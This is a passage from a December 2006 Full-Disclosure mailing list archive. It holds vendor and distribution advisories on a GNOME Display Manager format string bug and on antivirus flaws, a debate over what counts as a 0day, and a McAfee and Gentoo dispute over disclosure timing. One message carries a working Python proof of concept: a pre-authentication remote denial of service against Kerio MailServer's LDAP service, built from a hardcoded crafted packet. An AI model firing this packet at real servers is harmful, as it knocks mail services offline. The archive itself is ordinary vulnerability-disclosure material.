will write controlled values to arbitrary memory locations, which allows
execution of code with the privileges of the gdmchooser, typically the user
'gdm'. Although this user does not have a high privilege level, once this
account has been gained, it would be relatively simple to insert a logger
into gdm processes to capture other users passwords.

The gdmchooser is not accessible from the default login screens in any of
the tested Red Hat systems, however the preferences utility does contain
some preset screens which do contain it.

IV. DETECTION

This vulnerability has been confirmed to exist in the gdm-2.14.1-1 RPM from
Red Hat Fedora Core 5. The vulnerability was introduced into the
gdmchooser.c file in version 1.78 of gdm2/gui/gdmchooser.c in the GNOME CVS
source code repository.

V. WORKAROUND

If XDMCP functionality is not required, setting the permissions on the
gdmchooser to not allow execution will prevent any attempts at
exploitation.

VI. VENDOR RESPONSE

The GNOME maintainers have addressed this problem by releasing versions
2.14.11, 2.16.4, and 2.17.4 of the GNOME Display Manager.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/04/2006  Initial vendor notification
12/05/2006  Initial vendor response
12/14/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.



From James.Williams at ca.com  Thu Dec 14 17:43:45 2006
From: James.Williams at ca.com (Williams, James K)
Date: Thu, 14 Dec 2006 12:43:45 -0500
Subject: [Full-disclosure] [CAID 34870]: CA Anti-Virus vetfddnt.sys,
	vetmonnt.sys Local Denial of Service Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B620401DEE6DB@USILMS12.ca.com>

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: CAID 34870: CA Anti-Virus vetfddnt.sys, vetmonnt.sys Local 
Denial of Service Vulnerabilities

CA Vulnerability ID (CAID): 34870

CA Advisory Date: 2006-12-13

Discovered By: Rub?n Santamarta (reversemode.com)

Impact: Local unprivileged attacker can cause a denial of service.

Summary: Multiple instances of improper handling of NULL buffers 
in CA Anti-Virus allow local attackers to cause a denial of 
service condition.  This issue affects only consumer CA Anti-Virus 
products.

Mitigating Factors: Valid user account is required for successful 
attack.

Severity: CA has given this vulnerability issue a Low risk rating.

Affected Products:
Consumer Products:
CA Anti-Virus 2007 v8.1
CA Anti-Virus for Vista Beta v8.2
CA Internet Security Suite 2007 v3.0

Affected platforms:
Microsoft Windows

Status and Recommendation: 
CA has addressed this issue in the GA (Generally Available) 
software by providing a new automatic update on December 13, 2006. 
Customers running one of the GA products simply need to ensure 
that they have allowed this automatic update to take place.  For 
CA Anti-Virus for Vista Beta, this issue will be patched in the GA 
release of the software.

Determining if you are affected: 
View the Help>About screen and confirm that the product version is 
8.3.0.1 or above.  You can also verify application of the update 
by confirming that the vetfddnt.sys and vetmonnt.sys driver 
versions are 8.3.0.1 or above. These files are located in the 
%windows%\system32\drivers folder.

References (URLs may wrap): 
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for this vulnerability:
N/A
CA Consumer Support Security Notice for this vulnerability:
Low Risk CA Anti-Virus Vulnerability - Multiple Local Denial of 
Service
http://crm.my-etrust.com/login.asp?username=guest&target=DOCUMENT&open
parameter=2651
Solution Document Reference APARs: 
N/A
CA Security Advisor posting:
CA Anti-Virus vetfddnt.sys, vetmonnt.sys Local Denial of Service 
Vulnerabilities
http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=96883
CAID: 34870
CAID Advisory links: 
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34870
Discoverer: Rub?n Santamarta, Reverse Mode
http://www.reversemode.com/
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&fu
nc=fileinfo&id=41
CVE Reference: CVE-2006-6496
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6496
OSVDB Reference: OSVDB ID: 30845
http://osvdb.org/30845

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to vuln at ca.com, or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to vuln at ca.com, or utilize our "Submit a 
Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749
	
Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright ? 2006 CA. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA+AwUBRYGNUXklkd/ilBmFEQIhkQCgnWsOsaExlP35XlXqJ43AEF25n8IAmM2c
qNtUXVYSCMvxzSImOWOP/Zc=
=U2Zc
-----END PGP SIGNATURE-----

From juha-matti.laurio at netti.fi  Thu Dec 14 18:14:10 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 14 Dec 2006 20:14:10 +0200 (EET)
Subject: [Full-disclosure] The newest Word flaw is due to malformed data
 structure handling
Message-ID: <25499362.1192261166120050798.JavaMail.juha-matti.laurio@netti.fi>

And without any reasonable technical details it is very difficult to give a title field for the vulnerability.
Several advisories using titles like Word Unspecified Code Execution Vulnerability or Word Code Execution Vulnerability #2, #3 are not the trend we want.
Related to the newest Word issue US-CERT assigned a good title:
Microsoft Word malformed pointer vulnerability
http://www.kb.cert.org/vuls/id/996892

- Juha-Matti


Alexander Sotirov  wrote: 
> Juha-Matti Laurio wrote:
> > Related to the newest MS Word 0-day
> > http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-zero-day.aspx
> > 
> > US-CERT Vulnerability Note VU#166700 released today lists the following
> > new technical detail:
> > 
> > "Microsoft Word fails to properly handle malformed data structures
> > allowing memory corruption to occur."
> > http://www.kb.cert.org/vuls/id/166700
> 
> I appreciate your efforts to keep the community informed, but these kinds of
> "technical details" are completely useless. It's not your fault, this has been a
> long-standing problem with the information from coming from the likes of CERT
> and MSRC.
> 
> Almost all Office vulnerabilities (and security issues in file parsers in
> general) are a result of "malfromed data structures allowing memory corruption
> to occur". Repeating this statement for every Word bug doesn't tell us anything new.
> 
> Descriptions of vulnerabilities, especially ones that are found in the wild,
> should include enough information to allow researchers to uniquely identify the
> new vulnerability and differentiate it from all other bugs, both known ones and
> 0days. Without that level of detail, you end up with this:
> http://www.securityfocus.com/archive/1/443288
> 
> 
> Alex



From labs-no-reply at idefense.com  Thu Dec 14 17:48:23 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 14 Dec 2006 12:48:23 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.14.06: GNOME
 Foundation Display Manager gdmchooser Format String Vulnerability
In-Reply-To: <45818B88.20709@idefense.com>
References: <45818B88.20709@idefense.com>
Message-ID: <45818E67.8060500@idefense.com>

Below is the corrected CVE section.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-6105 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.





From debasis.mohanty.listmails at gmail.com  Fri Dec 15 07:52:54 2006
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Date: Thu, 14 Dec 2006 23:52:54 -0800
Subject: [Full-disclosure] Google AdWords Multiple HTTP response splitting
	vulnerabilities
Message-ID: <45819689.259299d7.0d0e.ffffe3b6@mx.google.com>

Google AdWords Multiple HTTP response splitting (aka CRLF Injection)
vulnerabilities
http://hackingspirits.com/vuln-rnd/vuln-rnd.html
 
 
regards,
-d
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/94de874d/attachment.html 

From nunotreez at gmail.com  Thu Dec 14 16:35:49 2006
From: nunotreez at gmail.com (Nuno Treez)
Date: Thu, 14 Dec 2006 17:35:49 +0100
Subject: [Full-disclosure] Fwd: NOT a 0day! Re: [fuzzing] OWASP Fuzzing page
In-Reply-To: 
References: <1165949078.24129.7.camel@localhost.localdomain>
	
	
Message-ID: 

---------- Forwarded message ----------
From: Nuno Treez 
Date: 14-dic-2006 17:33
Subject: Re: [Full-disclosure] NOT a 0day! Re: [fuzzing] OWASP Fuzzing page
To: Gadi Evron 

2006/12/14, Gadi Evron :

> > Wow! That's fun! The so called "Word 0 day" flaw also affects
> > OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> > with the file:
>
> This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> mode, on a mailing list (fuzzing mailing list).
>
[...]
> A 0day, whatever definition you use, is used in the wild before people are
> aware of it.

Agree with you, Gadi. Need to know what we are talking about.

From: http://www.tech-faq.com/0-day.shtml



What is 0-day?

0-day, pronounced "Zero Day" or sometimes "Oh Day", means "new."
The term has it's origins in the warez scene, but has become firmly
entrenched in the exploit trading scene.
If a game or an exploit was release on yesterday, it is 1-day. If it
was released a full week ago, it is 7-day.
0-day is used to refer to exploits released today and exploits that
have not yet been released.
An exploit might be 0-day to you because it was just publicly
released, but two-months old to members of the group that coded the
exploit.



Cheers.
--
Nuno Treez
--
Being a pain in the Internet's ass since 1996.
--
Si vis pacem para bellum. (Vegetius, Epitome rei militaris, 3. Praef.)
--



From juha-matti.laurio at netti.fi  Thu Dec 14 19:44:54 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 14 Dec 2006 21:44:54 +0200 (EET)
Subject: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page
Message-ID: <28829826.1209291166125495217.JavaMail.juha-matti.laurio@netti.fi>

After the public release we have to accept the fact that the PoC will be possibly accessible outside of exploit sites too.
The overall risk of the issue is increasing.
To confirm the existence of PoC it was listed in several references like
http://www.securityfocus.com/bid/21589/exploit
etc.

The metadata information of 12122006-djtest.doc states the following:

Created: 16th Aug 2006
Author: sarahbl

- Juha-Matti


Gadi Evron  wrote: 
> On Tue, 12 Dec 2006, Joxean Koret wrote:
> > 
> > Wow! That's fun! The so called "Word 0 day" flaw also affects
> > OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> > with the file:
> 
> This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> mode, on a mailing list (fuzzing mailing list).
> 
> I am not sure why I got this 10 times now, I thought the days of these
> bounces were over. But I am tired of seeing every full-disclosure
> vulnerability called a 0day anymore.
> 
> A 0day, whatever definition you use, is used in the wild before people are
> aware of it.
> 
> 
> > 
> > joxean at joxeankoret $ abiword 12122006-djtest.doc
> > 
> > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > 
> > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > 
> > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > 
> > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > joxean at joxeankoret $ ooffice 12122006-djtest.doc
> > OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
> > Using existing OpenOffice.org
> > Application Errorsh: line 1: crash_report: command not found
> > Application Error
> > 
> > Fatal exception: Signal 6

--clip--



From ge at linuxbox.org  Thu Dec 14 20:20:23 2006
From: ge at linuxbox.org (Gadi Evron)
Date: Thu, 14 Dec 2006 14:20:23 -0600 (CST)
Subject: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page
In-Reply-To: <28829826.1209291166125495217.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: 

On Thu, 14 Dec 2006, Juha-Matti Laurio wrote:
> After the public release we have to accept the fact that the PoC will be possibly accessible outside of exploit sites too.
> The overall risk of the issue is increasing.
> To confirm the existence of PoC it was listed in several references like
> http://www.securityfocus.com/bid/21589/exploit
> etc.
> 
> The metadata information of 12122006-djtest.doc states the following:
> 
> Created: 16th Aug 2006
> Author: sarahbl

Not a 0day.

> 
> - Juha-Matti
> 
> 
> Gadi Evron  wrote: 
> > On Tue, 12 Dec 2006, Joxean Koret wrote:
> > > 
> > > Wow! That's fun! The so called "Word 0 day" flaw also affects
> > > OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> > > with the file:
> > 
> > This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> > mode, on a mailing list (fuzzing mailing list).
> > 
> > I am not sure why I got this 10 times now, I thought the days of these
> > bounces were over. But I am tired of seeing every full-disclosure
> > vulnerability called a 0day anymore.
> > 
> > A 0day, whatever definition you use, is used in the wild before people are
> > aware of it.
> > 
> > 
> > > 
> > > joxean at joxeankoret $ abiword 12122006-djtest.doc
> > > 
> > > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > > 
> > > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > > 
> > > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > > 
> > > ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> > > joxean at joxeankoret $ ooffice 12122006-djtest.doc
> > > OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
> > > Using existing OpenOffice.org
> > > Application Errorsh: line 1: crash_report: command not found
> > > Application Error
> > > 
> > > Fatal exception: Signal 6
> 
> --clip--
> 



From research at gleg.net  Thu Dec 14 21:09:09 2006
From: research at gleg.net (research at gleg.net)
Date: Fri, 15 Dec 2006 00:09:09 +0300
Subject: [Full-disclosure] Kerio MailServer < 6.3.1 remote Denial of Service
Message-ID: <1166130549.4581bd75420a4@cp55.agava.net>

Hi,

Kerio MailServer 6.3.1 changelog mentions the following bug fix:
'Fixed possible service stop when handling certain LDAP query'

It turns out that vd_kms6 vulnerability (which is a part of VulnDisco since Oct,
2006) has been fixed.

Below is a simple proof of concept code for this bug:

#!/usr/bin/env python
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


"""
gdb backtrace:
# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1  0x0821c387 in LDAPSearchRequest::setAll ()
#2  0x08093d8a in Ber::getSearchRequest ()
#3  0x08205e48 in LDAPServer::search ()
#4  0x08207de0 in LDAPServer::server ()
#5  0x08207e2e in ldap_handler ()
#6  0x0841be13 in KServerTask::handler ()
#7  0x082033c6 in KThreadPool::workerThread ()
#8  0x086ee7b6 in kerio::tiny::thread ()
#9  0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:      
mov    (%eax),%edx
(gdb) i r eax
eax            0x449    1097
"""

from socket import *

host = "localhost"
port = 389

s =  "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()

Regards,
-Evgeny




From davek_throwaway at hotmail.com  Thu Dec 14 22:41:21 2006
From: davek_throwaway at hotmail.com (Dave "No, not that one" Korn)
Date: Thu, 14 Dec 2006 22:41:21 -0000
Subject: [Full-disclosure] [Fwd: MOST URGENT]
References: <4580825F.1050808@agent.co.il>
	<200612141346.kBEDk3oQ021863@turing-police.cc.vt.edu>
Message-ID: 

Valdis.Kletnieks at vt.edu wrote:
>What a frikking idiot.  That's "the former chief executive officer who
> recently died of Colonium-210 poisoning under mysterious circumstances".

  Colonium my arse!

    cheers,
      DaveK
-- 
Can't think of a witty .sigline today.... 





From kees at ubuntu.com  Thu Dec 14 23:41:52 2006
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 14 Dec 2006 15:41:52 -0800
Subject: [Full-disclosure] [USN-396-1] gdm vulnerability
Message-ID: <20061214234152.GY20388@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-396-1          December 14, 2006
gdm vulnerability
CVE-2006-6105
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  gdm                                      2.14.10-0ubuntu1.1

Ubuntu 6.10:
  gdm                                      2.16.1-0ubuntu4.1

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

A format string vulnerability was discovered in the gdmchooser component 
of the GNOME Display Manager.  By typing a specially crafted host name, 
local users could gain gdm user privileges, which could lead to further 
account information exposure.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1.diff.gz
      Size/MD5:    75226 062d37bcd1e10af4ed62467cb411cd2a
    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1.dsc
      Size/MD5:      886 85410f15a0ac5d3e78afd528675bb070
    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10.orig.tar.gz
      Size/MD5:  4699371 5a3767866e33bab2f553eccaa448b260

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1_amd64.deb
      Size/MD5:  1788460 d2ab3139edb370415541b32dc2ff8224

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1_i386.deb
      Size/MD5:  1722546 ac6d2fbc6e6ff9979543a6a0f9ab755e

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1_powerpc.deb
      Size/MD5:  1771750 77cf61ea08fa7f6fa9541cf3555aefae

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.10-0ubuntu1.1_sparc.deb
      Size/MD5:  1732952 0c9d3b1b35c0003a8ec9555620bb86fd

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1.diff.gz
      Size/MD5:    78060 309e27f53d2461f82fd6345e218adc15
    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1.dsc
      Size/MD5:      883 c2d212cf7792747c0402b94bfbb6aed5
    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1.orig.tar.gz
      Size/MD5:  4878838 a2e68fac4763f1cf1050eeb19accb43f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1_amd64.deb
      Size/MD5:  1774968 f616e84bcdb3e14a36971d83f43ab7c3

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1_i386.deb
      Size/MD5:  1727524 9a2cbc1b3977738e32f506cf5cfc1617

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1_powerpc.deb
      Size/MD5:  1762732 fc833e0417bbc5d785ae653d12bd904f

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.16.1-0ubuntu4.1_sparc.deb
      Size/MD5:  1723264 6ba26002800130986e94d112d839fedf

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/960f4a15/attachment.bin 

From David_Coffey at McAfee.com  Fri Dec 15 00:39:55 2006
From: David_Coffey at McAfee.com (David_Coffey at McAfee.com)
Date: Thu, 14 Dec 2006 18:39:55 -0600
Subject: [Full-disclosure] [ GLSA 200612-15 ] McAfee VirusScan: Insecure
	DT_RPATH
Message-ID: <4E7D23B56CB0F742BB97371D5258E6DE050EC4DB@dalexmb3.corp.nai.org>

Gentoo Security Team,

  On your security web page
(http://www.gentoo.org/security/en/index.xml), you make the following
statement about how you work with vendors in a professional manner: "We
work directly with vendors, end users and other OSS projects to ensure
all security incidents are responded to quickly and professionally."
This statement seems to contrast greatly your practice of not following
a "professional" responsible disclosure process; particularly, posting a
security issue only 8.5 hours after your initial report was confirmed by
McAfee and a mere 9 hours after you sent in your initial report.  

  Not following responsible disclosure places customers, both ours and
yours, at risk.  You put them at risk because you did not allow us even
a customary amount of time to make a fix available.  Now, the
information you posted could be used to create exploits, yet there is no
patch immediately available.  You apparently posted this information
without knowing or caring if there was a secure fix available for the
vulnerable users.  

This is not generally considered "responsible" practice.  If you are not
already aware, there are many responsible disclosure guidelines and
practices which have been published, like those outlined at
http://www.oisafety.org/ (we are founding members and adhere to these
guidelines).  These disclosure guidelines (or similar guidelines from
CERT and others) help protect the end user by both encouraging the
vendors to be responsive and making sure that there is a secure solution
available prior to disclosure.  Responsible disclosure is a good thing,
and we highly encourage you to adopt some form of it for your future
vendor interactions.  You seem to adopt some form of it for gentoo
related security issues, as it states on your vulnerability policy page
(http://www.gentoo.org/security/en/vulnerability-policy.xml), but you do
not seem to adopt it for issues in other vendor applications.

We regret that you felt the need to publish the vulnerability before we
could issue a fix to secure our users.  We are proceeding with
addressing this on our side as quickly as possible, as we would have, no
matter the timing of your disclosure.  At this point, we cannot commit
to a time frame, but it will be as soon as possible.  

   In another matter, McAfee disagrees with your statement that this is
a "high" severity issue, as the privilege of the executed code is not
raised from the privileges of the executing user.  In addition to this,
an attacker would have had to compromise the machine through another
mechanism in order to place the malicious library on the system.  

David Coffey
Manager of Product Security
McAfee, Inc.



From taviso at gentoo.org  Fri Dec 15 01:21:55 2006
From: taviso at gentoo.org (Tavis Ormandy)
Date: Fri, 15 Dec 2006 01:21:55 +0000
Subject: [Full-disclosure] [ GLSA 200612-15 ] McAfee VirusScan: Insecure
	DT_RPATH
In-Reply-To: <4E7D23B56CB0F742BB97371D5258E6DE050EC4DB@dalexmb3.corp.nai.org>
References: <4E7D23B56CB0F742BB97371D5258E6DE050EC4DB@dalexmb3.corp.nai.org>
Message-ID: <20061215012155.GB26552@sdf.lonestar.org>

On Thu, Dec 14, 2006 at 06:39:55PM -0600, David_Coffey at McAfee.com wrote:
> Gentoo Security Team,
> 
> This statement seems to contrast greatly your practice of not following
> a "professional" responsible disclosure process; particularly, posting a
> security issue only 8.5 hours after your initial report was confirmed by
> McAfee and a mere 9 hours after you sent in your initial report.  
> 

David, the issue had already been discussed in public as we informed
you. There is no point trying to bury an issue once it has already been
discussed in public, we issued an advisory to ensure that our users were
aware that the issue existed.

> This is not generally considered "responsible" practice.  If you are not
> already aware, there are many responsible disclosure guidelines and
> practices which have been published, like those outlined at
> http://www.oisafety.org/ (we are founding members and adhere to these
> guidelines). 

Not everyone believes these guidelines are in everyones best interests. 

>    In another matter, McAfee disagrees with your statement that this is
> a "high" severity issue, as the privilege of the executed code is not
> raised from the privileges of the executing user. In addition to this,
> an attacker would have had to compromise the machine through another
> mechanism in order to place the malicious library on the system.  

Well then you have a fundamental misunderstanding of the issue. Does an
attacker have to compromise your machine to get you to use your virus
scanner on an arbitrary file? No.

Your DT_RPATH tag instructs the dynamic loader to search the working
directory for shared libraries, if you scan an ELF DSO by invoking your
scanner on the file then executing arbitrary code is trivial. I sent you
a very clear example of this privately, including step-by-step
instructions on how to reproduce it. if you did not understand my
instructions, please contact me off-list and I will explain it in detail.

Thanks, Tavis.

-- 
-------------------------------------
taviso at sdf.lonestar.org | finger me for my pgp key.
-------------------------------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 238 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/c810bb4c/attachment.bin 

From security at mandriva.com  Fri Dec 15 02:07:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 14 Dec 2006 19:07:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:231 ] - Updated gdm packages fix
	string vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:231
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : gdm
 Date    : December 14, 2006
 Affected: 2007.0
 _______________________________________________________________________
 
 Problem Description:
 
 Local exploitation of a format string vulnerability in GNOME
 Foundation's GNOME Display Manager host chooser window (gdmchooser)
 could allow an unauthenticated attacker to execute arbitrary code on
 the affected system.

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6105
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 fa245d14d410ec1447e416bfa83e8f8b  2007.0/i586/gdm-2.16.0-2.1mdv2007.0.i586.rpm
 aa3e3845491fec59b81e3dfd3002926d  2007.0/i586/gdm-Xnest-2.16.0-2.1mdv2007.0.i586.rpm 
 5b0f4d242a3e34d7ab9b8fe1098ec226  2007.0/SRPMS/gdm-2.16.0-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 9fcd84e9208055d8692931528f52b0d3  2007.0/x86_64/gdm-2.16.0-2.1mdv2007.0.x86_64.rpm
 5b2499806469f41f6c32a59102212994  2007.0/x86_64/gdm-Xnest-2.16.0-2.1mdv2007.0.x86_64.rpm 
 5b0f4d242a3e34d7ab9b8fe1098ec226  2007.0/SRPMS/gdm-2.16.0-2.1mdv2007.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFgdkNmqjQ0CJFipgRApIOAJ0Ybh4j7nlfav7dZNHFo7fOw+qYqwCfaRZw
FVL46faEX8v8B2b3yzDF9+o=
=XTM2
-----END PGP SIGNATURE-----



From zdi-disclosures at 3com.com  Tue Dec 12 18:53:54 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 12 Dec 2006 10:53:54 -0800
Subject: [Full-disclosure] ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing
 Buffer Overflow Vulnerability
Message-ID: 

ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing Buffer Overflow
            Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-046.html
December 12, 2006

-- CVE ID:
CVE-2006-6335

-- Affected Vendor:
Sophos

-- Affected Products:
All versions of Sophos Anti-Virus < v2.40 scanning engine

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 12, 2006 by Digital Vaccine protection
filter ID 4917. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
